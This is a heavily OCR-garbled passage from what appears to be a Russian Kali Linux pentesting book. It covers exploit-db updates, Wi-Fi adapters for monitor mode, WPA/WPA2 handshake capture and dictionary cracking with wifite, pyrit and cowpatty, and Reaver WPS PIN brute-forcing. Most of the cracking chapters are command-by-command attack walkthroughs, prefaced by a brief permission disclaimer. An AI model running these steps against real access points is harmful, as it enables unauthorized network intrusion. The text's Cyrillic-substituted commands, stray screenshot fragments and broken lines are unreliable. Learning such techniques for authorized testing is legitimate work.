./рЬр/меЬаррБ/35893.іхі 
./рЬр/ыеЬаррБ/36058.іхі 
./рЬр/меЬаррБ/36054.іхі 
./рЬр/иеЬаррБ/36061.рЬр 
./рЬр/меЬаррБ/36135.іхі 
./рЬр/ыеЬаррБ/36193.іхі 
./рЬр/меЬаррБ/36230.іхі 
./рЬр/меЬаррБ/36242.іхі 
./рЬр/ыеЬаррБ/36243.іхі 
./рЬр/иеЬаррБ/36413.іхі 
./рЬр/меЬаррБ/36576.іхі 
./рЬр/меЬарр5/3660Ѳ.іхі 
./рЬр/ыеЬаррБ/36613.іхі 
./рЬр/меЬарр5/Збб71.іхі 
./рЬр/ѵеЬаррБ/36677.іхі 
./рЬр/меЬаррБ/36735.іхі 
./рЬр/меЬаррБ/36751.іхі 
./рЬр/меЬарр5/36777.іхі 
./рЬр/меЬаррБ/36800.іхі 
./рЬр/ыеЬарр5/368Ѳ2.іхі 
./рЬр/меЬаррБ/36805.іхі 
./рЬр/ѵеЬаррБ/36823.іхі 
./рЬр/меЬаррБ/36824.іхі 
./тиІіірІе/меЬаррБ/36930.іхі 
./рЬр/иеЬаррБ/36942.іхі 
./рЬр/меЬаррБ/37063.іхі 
./рЬр/ыеЬарр5/37Ѳ67.іхі 
./рЬр/меЬарр5/37Ѳ8Ѳ.іхі 
./рЬр/меЬаррБ/37109.іхі 
./рЬр/ыеЬаррБ/37182.іхі 
. /рЬр/меЬарр5/3719б .іхі 
./рЬр/меЬаррБ/37201.іхі 
./рЬр/меЬаррБ/37534.іхі 


тіаісатіпі -/орі і | 


Мне стало интересно, одинаковое ли количество файлов в установленной Базе данных 
эксплойтов и в базе зеагсбзріоіі:, которая в Каіі (благо, в Каіі как раз сегодня обновилась 
ехрІоіІбЬ): 


1| 

тіаІ@тіп1; "/орі $ Ііпсі /Ііоте/тіаІ/орі/ехрІоіІ-сІаІаЬаБе/рІаІІогтз/ -Іуре 1 | ѵѵс -1 

33888 

21 

гооІ(5)ѴѴеЬѴ\/аге-КаІІ:"# ІіпсІ /изг/зііаге/ехріоіісіь/ріаііогтз/ -Іуре 1 | ѵѵс -1 

98309 

3| 

гооІ@ѵѵеЬѴ\/аге-КаІІ:"# Ііпсі /изг/зііаге/ехріоіісіь/ріаііогтз/ -Іуре 1 | ѵѵс -1 

33824 
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Команду выполнял 2 раза — до принятия сегодняшних обновок и сразу же после их 
принятия: 




Подготовка к замене пакета 1іЬізссід82 1:9.8.4. сіізд .Р1 -6+пши2+сІеЬ7и4 (используется файл .../1іЬізссід82_1%За9 .8.4 .сіізд . 
Распаковывается замена для пакета 1іЬізссід82 ... 

Подготовка к замене пакета 1іЬ1\л/гез80 1 :9.8.4 .сіізд .Р1 -6+пти2+сіеЬ7и4 (используется файл ■.■/'ІіЫѵугез8Ѳ_1%За9 .8.4 .сіізд .Р1 
Распаковывается замена для пакета 

Подготовка к замене пакета 1 іЬсіП588 * А ' 

Распаковывается замена для пакета ІіЬсіп 

Подготовка к замене пакета ЫпсВиШз і| Г00 ^ ИеЬИа , /изг/зНаге/ехргоіЫЬ/рТаІГоггпз/ -Туре 


-6+птс 

ПР. 


Файл Правка Вид Поиск Терминал Справка 


Распаковывается замена для пакета Ьіпсі9 


Подготовка к замене пакета 1іЬЬіпсІ9-8Ѳ 
Распаковывается замена для пакета ІіЬЬіІ 


98309 


Подготовка к замене пакета Ьіпс19-с1ос 1: 


:~# ТіпсІ /изг/зЬагѳ/ехрІоіісіЬ/рІаІііогтз/ 

33824 


■Суре і | ѵус -1 


Распаковывается замена для пакета ЬіпсІЭ 
Подготовка к замене пакета ѳхрІоіісІЬ 20 
Распаковывается замена для пакета ехріо 
Обрабатываются триггеры для ІіЬдсІк-ріхЬ 
Обрабатываются триггеры для иі : ѵі ... 

Іл/АРМ: /ІіЬ із дгоир мгііаЫѳ! 

МАВІМ: /из г із дгоир ѵугііаЬІе! 
Обрабатываются триггеры для тап-сІЬ ... 
Настраивается пакет ІіЬѵ/тіѲ.2-7:атс1б4 ( 
Настраивается пакет 1іЬізс84 (1:9.8.4.сі 
Настраивается пакет 1іЬсІпз88 (1:9.8.4.сі 
Настраивается пакет 1іЬізссс80 (1:9.8.4 
Настраивается пакет 1іЬізссід82 (1:9.8. 
Настраивается пакет 1іЬЬіпс19-80 (1:9.8. 
Настраивается пакет ІіЫмгезвѲ (1:9.8.4 
Настраивается пакет ЬіпсіЭиііІз (1:9.8.4 
Настраивается пакет Ьіпсі9 (1:9.8.4 .сіізд 
іпззегѵ: ѵуагпіпд: сиггепі зіагі гипіеѵе 
іпззегѵ: у/агпіпд: сиггепі зіор гипіеѵеі 
Настраивается пакет ЬіпсіЭ-іюзі (1:9.8.4 


і(<МеЬМаге-КаІі:~# 


Настраивается пакет сіпзиіііз (1:9.8.4 .сіізд .Р1 -6+пти2+сіеЬ7и5) .. 
Настраивается пакет ЬіпсІ9-сіос (1:9.8.4 .сіізд .Р1 -6+пти2+с1еЬ7и5) 
Настраивается пакет ехрІоіісІЬ (20150703-ѲкаІіѲ) ... 

гооіуѴ.Ч'-І :~# [] 


ЕИ гооІ@ѴѴеЬѴѴаге-КаІі: - И гооТ@ѴѴеЬѴѴаге-КаІі: - 


[зЬаге] 


* Р5І+ 


Ничего себе обновились — минус 65 тысяч файлов! Наверное, какие-нибудь дубли или 
что-то подобное. 


Не забывайте время от времени обновлять : 


1 


~/орТ/ехрІоі1:-сІа1:аЬа5е/5еагсНзрІоіІ: -и 


Часть 3. Тестирование на проникновение беспроводных сетей 
Глава 18. Лучшие совместимые с Каіі Ыпих 115В ѴѴі-Рі адаптеры 

(2015) 

По материалам сайта ѵѵігеІеззНаск.огд, за наводку спасибо посетителю 51//Ѵ51//Ѵ51//Ѵ 

Чтобы проводить тест на проникновение беспроводных сетей с Каіі Ыпих нужен 
совместимый 115В \А/і-Рі адаптер (в простонародье «свисток»). Он нужен чтобы иметь 
возможность переходить в режим монитора (наблюдения), проводить инжекты 
пакетов и делать разные другие вещи, которые мы обычно делаем при беспроводном 
пентесте. 

При поиске адаптера, который работает с Каіі, в первую очередь нужно обращать 
внимание на чипсет который применяется для его изготовления. 

В этой заметке перечислены некоторые из совместимых с Каіі чипсетов, а также 
рассказано об адаптерах, в которых они применяются и которые можно найти в 
свободной продаже. Вот список этих чипсетов: 

• Аібегоз АВ9271 

• Ваііпк ВТ3070 
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. Каііпк КТ3572 

• ВеаІІек 81871 (беспроводные С адаптеры) 

Если вы нашли какую-то новую беспроводную карту ѴѴі-Рі, которая не указана в моём 
списке, но в которой использован один из этих чипсетов, то с высокой долей 
вероятностью она также подойдёт для тестов с Каіі. 

Да, и список чипсетов также неполный. Вот здесь вы найдёте много разной 
дополнительной информации. 

Если вы покупаете карту не из рекомендованного списка, то помните, главное 
ориентироваться на чипсет, а не название производителя. 

Также рекомендуется не покупать беспроводные карты, которые поддерживают 
только стандарт ѴѴі-Рі С (хотя они и стоят дешевле). Лучше купите устройство с 
поддержкой стандарта І\І, поскольку такие устройства обратно совместимы с С и могут 
использоваться и с N и с С. Большинство роутеров и устройств в настоящее время 
работают по стандарту N. 

Ещё стоит обратить внимание на охват, который будет иметь адаптер. Маленькие 115В 
адаптеры удобны в силу своего размера, но нужно помнить, что и их диапазон работы 
будет меньше по сравнению с адаптерами с большой антенной на 5 бЫ или 9 6Ы. 

Приступ к нашему списку самых популярных чипсетов и 118В ѴѴі-Рі адаптеров для Каіі. 

Адаптеры АІІа продолжают доминировать в пентестинге в 2015 году. Здесь список 
лучших совместимых с Каіі Ыпих 115В ѴѴі-Рі адаптеров со ссылками на онлайн магазин. 

Адаптеры, которые используют чипсет Каііпк КТ3070 


АКа АѴѴІІ5036ІЧН 2.4 СН г 
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АКа АѴѴІІ5036МЕН 2.4 СНг 



Рапсіа РАІІ05 2.4 СНг 
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Адаптеры, которые используют чипсет АК9271 


АКа АѴѴІІ5036ІЧНА 



ТР-иі\ІКТІ.-\Л/М722М 2.4 СН 2 
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Адаптеры, которые используют чипсет КТ3572 
АІТа АѴѴІІ5051ІМН двухчастотная 2.4 СНг и 5.8 СНг 

Обратите внимание на этот беспроводной адаптер, он является одним из самых 
любимых у пентестеров. Также важный его плюс — это поддержка частот 2.4 ОНг и 5.8 
0Н2. 


АІ.РА 

N Е Т \Л/ О РЧ К 



ѵѵѵѵѵѵ.аИа.сот.Іѵѵ 

Беспроводные ЫБВ адапеты с поддержкой только стандарта С, чипсет 
КеаІІек 81871 

Следующие У5В адаптеры были в прошлом бестселлерами, но поскольку они 
поддерживают только беспроводной стандарт С их можно назвать устаревшими. Под 
«прошлым» здесь подразумевается 2-5 лет назад. Под «устаревшими» здесь 
подразумевается «не будут работать в отношении самых новых ТД, в которых 
настроена работа только по стандарту І\І». 
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АІГа АѴѴІІ5036Н 115В адаптер 2.4 СН г 



№ееаг \Л/С111ѵ2 115В адаптер 2.4 СНг 
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Дешёвый адаптер дальнего радиуса действия, который работает с КаМ 

Это пример дешёвого адаптера дальнего радиуса действия (48 сІВі) который использует 
чипсет Каііпк 3070, который хорошо работает с Каіі. У него есть проблемы с любыми 
версиями \А/і псіохл/5, кроме \Л/іпсіоѵѵз 7 и он не работает с Мае. Если вам нужны 
адаптеры с хорошей поддержкой, посмотрите упомянутые выше, выберите те из них, 
которые поддерживают стандарт N. 

Ні§Іі Роѵѵег 5і§паІКіп§ 5і§паІ Кіп§ 48РВІ 
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Адапетры 4С совместимые с КаМ Ыпих 

ІМооЕІес ІЧЕ50К Міпі 2 115В КТІ.-50К и А05-В Кесеіѵег 5еІ, КЛ2832и & 
К820Т2 Типег, МСХ Іприі. 

РСП.-50К тюнер — этот свисток может собирать различные 4С сигналы с Каіі Ыпих. 
Захваченные данные могут быть проанализированы, особенно это касается НЕ и С5М, 
но нужно понимать, что эти сигналы полностью зашифрованы. Этот прибор довольно 
функционален, хотя и недорогой — меньше 25 долларов (при нормальном курсе это 
совсем недорого). Он, кстати, является новинкой. 



Глава 19. Взлом ѴѴі-Рі пароля (ѴѴРА/ѴѴРА2), используя ругіі и 
соѵѵраііу в Каіі Ыпих 

Оговорка: Эта инструкция только для тренировочных и образовательных целей. 
Убедитесь, что у вас есть разрешение, перед тем, как атаковать точки доступа, 
поскольку это является нарушением закона во многих странах. Я не несу никакой 
ответственности за использование этих инструкций, содержащихся в этом 

руководстве. 

Для защиты своего беспроводного роутера от взлома, следуйте рекомендациям по 
обеспечению безопасности точек доступа \А/і-Рі . 

Если у вас какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться со статьёй « Лучшие совместимые с Каіі ііпих ІІ5В \А/І-Еі адаптеры ». 

Взлом \Л/і-Рі пароля (\Л/РА/\Л/РА2), используя ругіі и соѵѵраііу с сисіа или 
саірр в Каіі Ыпих 

Слишком много инструкций по взлому \Л/іЯ ѴѴРА/ѴѴРА2 пароля, в каждой из которых 
используются различные методы. Каждый имеет свой собственный взгляд на это. 
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Лично я думаю, нет правильных или неправильных способов взлома беспроводной 
точки доступа. Следующий способ — это мой способ, и я нашёл его крайне 
эффективным и быстрым во время моих тестов по взлому пароля ѴѴіІі ѴѴРА/ѴѴРА2, 
используя ругіі и соѵѵраііу в КаІІ Ыпих, где я проводил атаку по словарю, с 
использованием сиба или саірр (саІ++), и в то же самое время я использовал ѴѴіРіІе для 
ускорения некоторых вещей. Весь процесс был осуществлён в КаІІ Ыпих и занял у меня 
меньше чем 10 минут на взлом ѴѴіІі ѴѴРА/ѴѴРА2 пароля с помощью комбинации из 
ругіі;, соѵѵраііу и ѴѴіРіІе, используя мой ноутбук с графической картой АІѴЮ. 

Вы можете сделать этот процесс быстрее, как это сделала я. Если у вас есть видеокарта 
АІѴЮ АТІ, вам нужно воспользоваться нижеследующими инструкциями. 

Пользователи ІМѴЮІА: 

1. Установите драйвер ІМѴЮІА на КаІІ Ыпих - ІМѴЮІА ускоренный графический 

драйвер Ыпих 

2. Установите модуль ядра драйвера ІМѴЮІА СІЮА и Ругіі; на КаІІ Ыпих - СІЮА, Ругіі 
и Сругіі-сиба 

Пользователи АІѴЮ: 

1. Установите проприетарный ійігх драйвер АМР АТІ ійігх на КаІІ Ыпих 

2. Установите АМР АРР 5РК в КаІІ Ыпих 

3. Установите СА1.++ в КаІІ Ыпих 

4. Установите Ругіі 

Читатели, кто хочет попробовать альтернативные способы взлома пароля ѴѴіІі ѴѴРА 
ѴѴРА2, используйте НазбСаІ или сибаНазбса! или осІНазбса! для взлома неизвестного 
ѴѴіІі ѴѴРА ѴѴРА2 пароля. Польза от использования НазЬсаІ в том, что вы можете создать 
ваше собственное правило, соответствующее макету, и выполнить атаку методом 
перебора. Это альтернатива использования атаки по словарю, где словарь может 
содержать только определённое количество слов, но атака методом перебора 
позволит вам проверить каждую возможную комбинацию заданных символов. Назбсаі 
может взламывать ѴѴіІі ѴѴРА/ѴѴРА2 пароли и вы также можете использовать её для 
взлома ІѴЮ5, рНрВВ, Му50.І_ и 5НА1 паролей. Использование НазЬсаІ является хорошим 
вариантом, если вы можете предположить 1 или 2 символа в пароле, это занимает 12 
минут на его взлом. Если вы знаете 4 символа в пароле, это занимает 3 минуты. Вы 
можете сделать правила, перебирать только буквы и цифры для взлома совершенно 
неизвестного пароля, если вы знаете, что дефолтный пароль конкретного роутера 
содержит только их. В этом случае возможность взлома намного выше. 

Важное замечание: Многие пользователи пытаются сделать захват с сетевой картой, 
которая не поддерживается. Вам следует купить карту, которая поддерживает КаІІ 
1_іпих, включая инъекцию, режим мониторинга и т. д. Список может быть найден в 
статье «Рекомендуемые 802.11 сетевые карты для КаІІ Ыпих (в том числе 115В)». Очень 
важно, чтобы вы имели поддерживаемую карту, в противном случае вы просто зря 
потратите время и усилия на что-то, что не принесёт результата. 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


130 













Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Захват НапсІзНаке с ѴѴіРіІе 

Почему мы используем ѴѴіРіТе, вместо Аігсгаск-п§, как в других руководствах? Потому 
что это быстрее и нам не нужно печатать команды. Переводим беспроводную карту в 
режим прослушивания: 


1| 

аігтоп-п§ зТагТ ѵѵІапО 

Наберите следующую команду в вашем терминале Каіі Ыпих: 

1| 

ѵѵіТіТе -ѵѵра 

Вы также можете напечатать: 

1| 

ѵѵіТіТе ѵѵра2 

Если вы хотите видеть всё (ѵѵер, ѵѵра ог \л/ра2), то просто введите следующую команду 
— разницы никакой нет, просто это займёт на несколько минут больше: 

1| 

ѵѵіТіТе 


Когда программа закончит работу, то мы увидим доступные точки доступа (ТД — для 
краткости). Обратите внимание на столбец СІ_ІЕІ\ІТ5. Всегда пробуйте те ТД, в которых в 
этом столбце есть запись сІіепТз, потому что это просто намного быстрее. Вы можете 
выбрать все или отобрать по номеру. Для этого в появившееся приглашение нужно 
набрать аІІ - если вы хотите все, или набрать номера, разделённые запятыми. В моём 
случае я набрал 1,2 и нажал ЕІМТЕК. 

Отлично, у меня отобразилось несколькоТД с пометкой сІіепТз, я выберу первую и 
вторую, т. к. они имеют самый сильный сигнал. Пробуйте выбирать те, в которых 
сильный сигнал. Если вы выберите со слабым, то, возможно, вам придётся ждать 
ДОЛГО до того, как вы что-нибудь захватите... если это вообще получится. 

Итак, я выбрал 1 и 2 и нажал ЕІМТЕК, чтобы \А/іРіТе делала свою магию. 

Когда вы нажали ЕІМТЕК, обратите внимание на вывод. У меня не хватило терпения 
дождаться, пока с номером 1 что-нибудь произойдёт, т. к. ничего не происходило в 
течение ДОЛГОГО времени. Поэтому я нажал СТКІ.+С для выхода. 


На самом деле, это хорошая функция ѴѴІЯіе, т. к. программа спросила: 


1| 

ѴѴНаІ: сіо уои ѵѵапі іо сіо? 

2 1 

[с]опііпие аНаскт§ іаг^еіз 

3| 

[е]хіі сотріеіеіу. 


Я могу выбрать с, для продолжения с другими ТД, или е — для выхода. Это та функция, 
о которой я говорил. Я набрал с для продолжения. В результате была пропущена 
ТД под номером 1 и началась атака на номер 2. Это отличная опция, т. к. не все 
роутеры или ТД или цели будут отвечать на атаку сходным образом. Вы можете, 
конечно, подождать и однажды получить ответ, но если вы это делаете в учебных 
целях и вам интересует ЛЮБАЯ ТД, то это просто сохранит время. 

И вуаля, для захвата рукопожатия (ГіапсІзКаке) потребовалось всего несколько секунд. 
Эта ТД имела множество клиентов и я получил своё рукопожатие. 

Это рукопожатие было сохранено в файле /гоо1:/б5/Ві§РопсІ_58-98-35-Е9-2В-80.сар. 
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Когда захват завершён и больше нет ТД для атаки, ѴѴіЯіе просто выйдет и вы получите 
обратно запрос командной строки. 

Теперь, когда у нас есть захваченный файл с рукопожатием в нём, вы можем сделать 
несколько вещей: 

1. Мы можем использовать атаку по словарю. 

2. Мы можем использовать атаку грубой силой. 

• Среди брутфорса мы можем использовать сгипсЬ 

• Мы можем использовать осИтазЬсаІ: 

В этой инструкции я покажу атаку по словарю, т. к. почти 20% (каждая пятая) ТД будет 
иметь стандартный пароль из словаря. Ниже в этой инструкции я покажу атаку 
методом перебора. 

Атака по словарю захваченного файла .сар для взлома \Л/і-Рі пароля 

Чтобы осуществить атаку по словарю, нам нужно заиметь файл словаря. 

Каіі Ыпих поставляется с некоторыми файлами словарей, как часть стандартной 
установки. Как мило. Спасибо команде разработки Каіі Ыпих. 

Давайте скопируем лучший файл словаря в каталог гооТ: 


1| 

ср /и5г/зКаге/ѵѵогсІІІ5І$/госкуои.1:х1:.§2 . 

Распакуем его: 

1| 

§итір госкуои.ІхСёі 


Поскольку, согласно требованиям, минимальный пароль ѴѴРА2 может быть в 8 
символов, давайте пропарсим файл, чтобы отфильтровать любые пароли, которые 
менее 8 символов и более 63 (на самом деле, вы можете просто пропустить эту 
строчку, это полностью на ваше усмотрение). Таким образом, мы сохраним этот файл 
под именем пеѵѵгоскуои.М: 


1| 

саі госкуои.ЪД | зог! | ипіц | рѵѵ-іпзресіог -т 8 -М 63 > пеѵѵгоскуоиТхІ: 

Давайте посмотрим, как много паролей содержит этот файл: 

1| 

ѵѵс -1 пеѵѵгоскуои.іхі: 

В нём целых 9606665 паролей. 

Оригинальный файл содержит ещё больше: 

1| 

ѵѵс -1 госкуои.ЪД 

Там 14344392 паролей. Итак, мы сделали этот файл короче, что означает, мы можем 
протестировать ТД в более сжатый срок. 

Наконец, давайте переименуем этот файл в ѵѵра.ізі:: 

1| 

тѵ пеѵѵгоскуои.ЪД ѵѵра.ізі: 
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Создаём Е55Ю в базе данных Ругіі 


Сейчас нам нужно создать Е55Ю в базе данных Ругіі: 


1 


ругіі -е ВІ§Ропс) сгеа1е_е55Ісі 


ВНИМАНИЕ: Если в названии ТД есть пробел, например, "ІЧеіСотт \Л/ігеІе5$", тогда 
ваша команда будет вроде этой: 


1 


ругіі: -е ’МеІСотт ѴѴігеІезз' сгеа1е_ез5ІсІ 


Я знаю, много людей столкнулись с этой проблемой 

Шикарно, теперь у нас есть Е55Ю, добавленный в базу данных Ругіі:. 


Импортируем словарь в Ругіі: 


Сейчас, когда Е55Ю добавлен в базу данных Ругіі, давайте импортируем наш словарь 
паролей. 


Используйте следующую команду для импорта предварительно созданного словаря 
паролей \л/ра.І$1 в базу данных Ругіі: 


1 


ругіі -і /гооі/ѵѵра.ізі ітрог1_ра55\л/огсі5 


Создайте таблицы в Ругіі, используя пакетный (ЬаІсН) процесс 


Это просто, просто наберите следующую команду: 


1 


ругіі ЬаІсИ 


Так как данная операция выполняется на ноуте с дерьмовенькой графической картой, я 
имею только 15019 РМКз в секунду (это включает мой САІ.++). Если у вас более мощная 
графическая карта и вы установили или СІЮА для видеокарты ІМѴЮІА, или САІ.++ для 
карты АІѴЮ, ваша скорость будет намного выше. 


Процессор в моём случае занят на 100%, температура на ядрах поднялась до 94 
градусов Цельсия. Вы должны быть осторожны, насколько большой ваш файл словаря 
и насколько ГОРЯЧИЙ ваш процессор и графическая карта. Используйте 
дополнительное охлаждение, чтобы избежать повреждения. 


Процесс взлома 

Мы можем взламывать используя несколько различных процессов. 

1. Используя Ругіі 

2. Используя СоѵѵраМу 

Атака на рукопожатие (ИапсІзИаке) из базы данных, используя Ругіі 


Легко. Просто используйте следующую команду для начала процесса взлома: 


1 


ругіі -г Іі5/ВІ§РопсІ_58-98-35-Е9-2В-80.сар а!1аск_сІЬ 


Вот и всё. Это заняло несколько минут, чтобы пройти по всей таблицы базы данных для 
получения пароля, если он присутствует в словаре. У меня скорость достигла 
159159186.00 РМК'з в секунду и это заняло меньше чем 1 секунду для его взлома. Это, 
безусловно, быстрее всего. 
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На заметку: Я пробовал это на другой машине с графической картой ІМѴЮІА с 
установленными СІЮА и Сругіі-СІЮА. Очевидно, это было намного быстрее моего 
ноутбука. Но в любом случае, это супер быстро. 

Если на этом этапе появилась ошибка Ругіі, то посмотрите статью " Решение проблемы с 
ошибкой Ругіі: ІОЕггог: ІіЬрсар-еггог ѵѵЫІе геасііпщ ТгипсаТесІ битр ЯІе; ІгіесІ Іо геасі 424 

саріигесі Ьуіез, опіукоі 259 ". 

Атака на рукопожатие (ИапсІзИаке) с паролем из файла или словаря, 
используя Ругіі 


Если вам не хочется создавать базу данных и сгипсб, а хочется напрямую копошиться в 
файле словаря (что много медленнее), вы можете сделать следующее: 


1 


ругіі: -г Іі5/ВІ§Ропс)_58-98-35-Е9-2В-80.сар -і /гооТ/ѵѵра.І5І: а11аск_ра55ІІігои§Іі 


Скорость этого способа? 7807 РМКз в секунду. На мой вкус намного медленнее. 


Взламываем используя Соѵѵраііу 


Для взлома с использованием соѵѵраііу, вам нужно экспортировать в формат соѵѵраііу 
и затем начать процесс взлома. 

Экспорт в соѵѵраііу 


Надеюсь, вплоть до этого момента всё прошло как планировалось и всё отработало. Из 
Ругіі: мы можем перенаправить наш вывод в соѵѵраііу или в аігоІіЬ-п§. Все мои тесты 
показывают, что соѵѵраііу намного быстрее, поэтому я остановился на нём. 


Поэтому давайте сделаем наш файл соѵѵраііу. Это опять просто, наберите следующие 
команды, для экспорта вашего вывода в соѵѵраііу: 


1 


ругіі -е ВІ§РопсІ -о соѵѵ.оиі ехрог1_соѵѵра11у 


Прибавим ходу: взлом \Л/РА \Л/РА2 Р5К паролей в соѵѵраііу 


Теперь, когда у нас есть вывод в соѵѵраііу, давайте взломаем парольную фразу 
\Л/РА2/Р5К. Наберите следующую команду для начала процесса взлома: 


1 


соѵѵраііу -сі соѵѵ.оиі -5 ВІ§РопсІ -г Н5/ВІ§Ропсі_58-98-35-Е9-2В-80.сар 


После того, как вы введёте это, куча паролей будет проверена на соответствие вашему 
хеш файлу. Это будет продолжаться до перебора всех паролей. Как только в файле 
словаря будет найден соответствующий пароль, процесс взлома остановится и вам 
будет выведен пароль. 


И бинго, программа нашла соответствующий пароль. Посмотрим на количество 
паролей, перебранных в секунду. У меня это 164823.00 паролей/секунду. 

ВНИМАНИЕ: соѵѵраііу вылетит (аварийно прекратит работу), если ваш файл 
паролей/словарь больше, чем 2 Гб. Вы должны будете остановиться на аігоІіЬ-п§, 
хоть это и медленнее. 


Атакуем рукопожатие (НапсІзНаке) из файла соѵѵраііу, используя Ругіі 


Есть ещё один способ использования Ругіі. 
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Вы можете в следующий раз использовать файл соѵѵ.оиі в Ругіі:: 


1 


ругіі: -г Іі5/ВІ§Ропс)_58-98-35-Е9-2В-80.сар -і /гооі/соѵѵ.оиі а11аск_соѵѵра11у 


Скорость этого способа? 31683811 РМК$ в секунду. Намного медленнее, чем 
использование процесса Ругіі; а!1аск_сІЬ. Но, по крайней мере, при этом способе вам не 
нужен пакетный (Ьаісіі) процесс. 


Очищаем Ругіі: и базу данных 


Наконец, если нужно, вы можете удалить ваш еззісі и сделать очистку: 


1 


ругіі: -е ВІ§Ропсі сіеІе1е_е55Ісі 


Завершение 

Этот процесс не всегда возможен, и иногда взлом \А/і1і пароля ѴѴРА/ѴѴРА2 намного 
проще с использованием Кеаѵег-\Л/Р5. Думаю, вам захочется также проверить и тот 
способ. 


Глава 20. Взлом \Л/іЯ \Л/РА/\Л/РА2 паролей с использованием 
Кеаѵег 

Если у вас какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с КаІІ ііпих ІІ5В ѴЛ-Еі адаптеры 

Обзор Кеаѵег 

Кеаѵег предназначен для подборки пина \Л/Р5 (ѴѴіІі Ргоіесіесі 5е1ир) методом перебора. 
Конечной целью является расшифровка пароля ѴѴРА/ѴѴРА2. Кеаѵег создан для 
надёжной и практичной атаки на ѴѴР5, он прошёл тестирование на большом 
количестве точек доступа с разными реализациями \Л/Р5. В среднем, Кеаѵег раскрывает 
пароль ѴѴРА/ѴѴРА2 в виде простого текста целевой точки доступа (ТД) за 4-10 часов, в 
зависимости от ТД. На практике, ему обычно нужна половина этого времени на 
предположение пина \Л/Р5 и разгадки пароля. 

Т.к. оригинальная версия Кеаѵег не обновлялась с января 2012 года, то был сделан 
форк. Сайт форка — НіІрзУ/сосІе.йООйІе.сот/р/геаѵег-ѵѵрз-Іюгк/ . Последние изменения 
в форке датируются январём 2014 года. 

Жизнь не стоит на месте. И совсем недавно (в апреле 2015 года) была официально 
выпущена модифицированная версия форка Кеаѵег. Сайт этой модификации — 
НіІрзУ/щіДиЬ.сот/ібх/геаѵег-ѵѵрБ-Іюгк-Ібх . Главное её отличие в том, что она может 
использовать атаку Ріхіе Оизі для нахождения верного пина Ѵ\/Р5. Эта атака применима 
ко многим точкам доступа Каііпк, Вгоаскот и КеаІІек. Атака, используемая для этой 
версии, разработана ѴѴііге. 

Запускается модифицированная версия Кеаѵег точно также, как и форк. О новых 
ключах форка и какие нововведения он нам несёт будет рассказано ниже. 

Перед тем, как мы начнём, заинтересованных в теме анализа и взлома ѴѴі-Рі сетей 
перенаправляю также к статье « Взлом \А/і-Рі пароля (\А/РА/Ѵ\/РА2), используя ругіі: и 
соѵураНу в КаІі Ііпих ». Там используется метод перехвата рукопожатия (программой 
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ѴѴіІіІе) и предлагается очень быстрый метод расшифровки пароля. Скорость 
достигается за счёт применения техники значительного ускорения перебора паролей. 

Основные векторы взлома ѴѴі-Рі сетей: 

• перехват рукопожатий (хендшейков) и последующий их брутфорсинг 

• подбор пина на ТД с включённым ѴѴР5. 

Данная статья посвящена второму способу. 

Если вы перехватили рукопожатия и вы хотите применить атаку брут-форсинг, то у меня 
есть ещё пара ссылок для вас. Во-первых, статья, которую я рекомендовал чуть выше, 
рассказывает, как произвести быстрый перебор по словарю. А в статье « Взлом паролей 
ѴѴРА2/ѴѴРА с помощью НазЬсаТ в Каіі Ыпих (атака перебором ѴѴі-Рі паролей по маске) », 

как следует из её названия, рассказано о переборе по маске. Это значительно ускорит 
процесс, если нам известны некоторые символы из пароля, либо мы знаем правила, в 
соответствии с которыми этот пароль генерировался. Вообще НазГісаІ: мощная 
программа, которая может взламывать не только пароли \Л/і1і ѴѴРА/ѴѴРА2, но и пароли 
ІѴЮ5, рГірВВ, Му5Щ, 5НА1 и многие другие. 


Суть метода атаки Кеаѵег — подбор \Л/Р5 

Главное, что нам нужно от атакуемой точки доступа, это включённость на ней ѴѴР5. В 
случае правильного введения пина, ТД сама предоставит нам необходимые данные 
для аутентификации (в т.ч. \Л/РА Р5К). 

Как уже было сказано, нужно ввести правильный пин. Думаю, все уже догадались, что 
Кеаѵег занимается тем, что перебирает пины, пока не найдёт верный. Об этом пине 
известно следующее: это восьмизначное число. Вводить его можно в любое время — 
каких-либо действий со стороны владельца ТД не требуется. Нам не нужна никакая 
больше информация: ни о настройках ТД, ни о шифровании или конфигурации. Для 
восьмизначных чисел возможно 10 Л 8 (100,000,000) вариантов. Но последняя цифра не 
является случайно, она рассчитывается по алгоритму, т. е. говоря простым языком, 
последнюю цифру мы всегда знаем, и количество возможных вариантов сокращается 
до 10 Л 7 (10,000,000). 

Ну и будто бы специально, чтобы нам было проще брутфорсить, пин делится на две 
половины, и каждая из этих половин проверяется индивидуально. Это означает, что 
для первой половины 10 Л 4 (10,000) возможных вариантов, а для второй — всего 10 Л 3 
(1,000), т. к. последняя цифра не является случайной. 

Кеаѵег подбирает первую половину пина, а потом вторую. Общее число возможных 
вариантов, как мы только что посчитали, равняется 11,000. Скорость, с которой Кеаѵег 
тестирует номера пинов полностью зависит от скорости с которой ТД может 
обрабатывать запросы. Некоторые достаточно быстрые — можно тестировать по 
одному пину в секунду, другие — медленнее, они позволяют вводить только один пин 
в 10 секунд. 


Установка Кеаѵег 

Установите Каіі Ыпих, там уже всё встроено. (Кеаѵег, ІіЬрсар и ІіЬзцІіІеЗ). 
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Использование Кеаѵег 


Начинаем вводом команды: 


1 


аігтоп-п§ 


гооІ@МіАІ: “ 

Файл Правка Вид Поиск Терминал Справка 


:~# аігтоп-пд 

РНУ ІігСег^асѳ Огіѵег 

рЬуѲ ѵЛапѲ іѵ/ІѴі/іТі 

:~# | 


И смотрим на вывод, точнее нас интересует только интерфейс. Он называется ѵѵІапО. 
Теперь набираем команду аігтоп-п§ зТагТ <имя_интерфейса> 

У меня так: 


СЬірзеІ: 

ІгтСеТ. Согрогаііоп Сепігіпо Асіѵапсѳсі-М 6235 (геѵ 24) 



1 


аігтоп-п§ зІаіТ: ѵѵІапО 


Для Кеаѵег нужна следующая информация: имя интерфейса и В55Ю целевой 
ТД. Узнать, какие ТД находяться в радиусе доступности, а также их В55Ю можно так: 


1 


аігос!итр-п§ -ѵѵрз ѵѵІапОтоп 


СН 6 ][ ЕІарзесІ: 

1 шіп ][ 2015-06-18 

19:10 








ВЗЗЮ 

РШ Веасопз #Ра1:а, 

#/5 СН 

МВ 

ЕМС 

СІРНЕВ 

АІІТН 

ІА/Р 5 


Е55Ю 

20:25:64:16:58:8С 

-38 252 

76 

0 1 

54е 

МРА2 

ССМР 

Р$К 



Міаі 

0С:54:А5:С0:24:Р6 

-66 272 

0 

0 9 

